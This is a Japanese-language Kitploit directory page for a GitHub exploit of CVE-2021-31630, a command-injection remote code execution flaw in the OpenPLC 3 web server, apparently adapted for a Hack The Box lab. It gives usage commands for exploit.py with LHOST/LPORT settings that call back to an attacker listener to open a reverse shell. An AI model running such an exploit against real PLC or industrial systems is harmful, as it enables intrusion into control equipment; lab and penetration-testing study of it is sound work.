Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-31630 — OpenPLC 3 WebServer の認証済みリモートコード実行。 | Kitploit
ツール/GitHubGitHub/manuelsantosiglesias/cve-2021-31630
脆弱性分析エクスプロイトSCADA/ICSセキュリティウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubmanuelsantosiglesias/cve-2021-31630

CVE-2021-31630

OpenPLC 3 WebServer の認証済みリモートコード実行。

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-31630

OpenPLC 3 WebServer 認証済みリモートコード実行。

説明

Open PLC Webserver v3 にはコマンドインジェクションが存在し、リモートの攻撃者が任意のコードを実行できます。HTB の Wifinetictwo.htb マシンでのみテスト済みです。

この脆弱性を悪用するすべてのスクリプトで問題が発生しました。おそらく Parrot を使用しているか、ブラウザが原因かもしれません。ログインには Chromium が動作しますが、Firefox ではログインに問題があり、ログイン用の POST リクエストで Web サーバーに何か奇妙なことが起こります。

thewhiteh4t のスクリプトを修正しました。一部(主にアップロードメソッド)はコピーしただけですが、エクスプロイトを起動するためにサーバーからクッキーを取得する部分を変更しました。

元の PoC は Fellipe Oliveira によって提供されています。

同じ問題でお困りの場合、お役に立てば幸いです。

依存関係

root@kitploit:~
pip3 install requests

使用方法

root@kitploit:~
python3 exploit.py http://10.129.x.x:8080 user pass --lhost 10.10.x.x --lport xxxx

あるいは、exploit.py を変更することもできます。

root@kitploit:~
...
# LHOST y LPORT defaults
LHOST = '10.10.1.1'
LPORT = '4444'
...

python3 exploit.py http://10.129.x.x:8080 user pass
ツールをダウンロード